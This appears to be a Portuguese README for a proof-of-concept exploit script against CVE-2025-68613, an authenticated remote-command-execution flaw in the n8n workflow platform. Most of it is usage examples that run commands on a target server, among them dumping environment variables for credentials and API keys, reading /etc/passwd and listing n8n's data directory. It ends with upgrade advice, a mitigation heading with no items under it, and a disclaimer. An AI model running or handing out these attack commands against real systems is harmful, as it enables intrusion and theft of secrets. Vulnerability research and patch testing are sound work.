
CVE-2025-68613 — RCE no n8n via Injeção de Expressão
Apenas para fins educacionais e de pesquisa de segurança autorizada.
Vulnerabilidade crítica de RCE (CVSS 9.9) na plataforma de automação de workflows n8n. Usuários autenticados podem executar comandos arbitrários do SO através do nó executeCommand, ignorando as restrições da sandbox.
| Campo | Detalhe |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (Crítico) |
| Versões afetadas | >= 0.211.0 < 1.120.4 |
| Autenticação necessária | Sim (qualquer usuário com permissões de criação de workflows) |
| Testado em | n8n 1.119.1 |
| Corrigido em | 1.120.4, 1.121.1, 1.122.0 |
O n8n avalia os parâmetros dos nós do workflow no lado do servidor. O nó executeCommand executa comandos shell diretamente no host com os privilégios do processo n8n. Qualquer usuário autenticado com permissões de criação ou edição de workflows pode abusar disso para obter RCE total.
bash poc_final.sh <target> <email> <password> <command>
Exemplos:
# Basic RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# Read sensitive files
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# List n8n data directory
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
Nota: Se sua senha contiver caracteres especiais como
!, use aspas simples.
Atualize para n8n >= 1.120.4 imediatamente.
Se a atualização não for possível imediatamente:
Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal. O autor não se responsabiliza por qualquer uso indevido.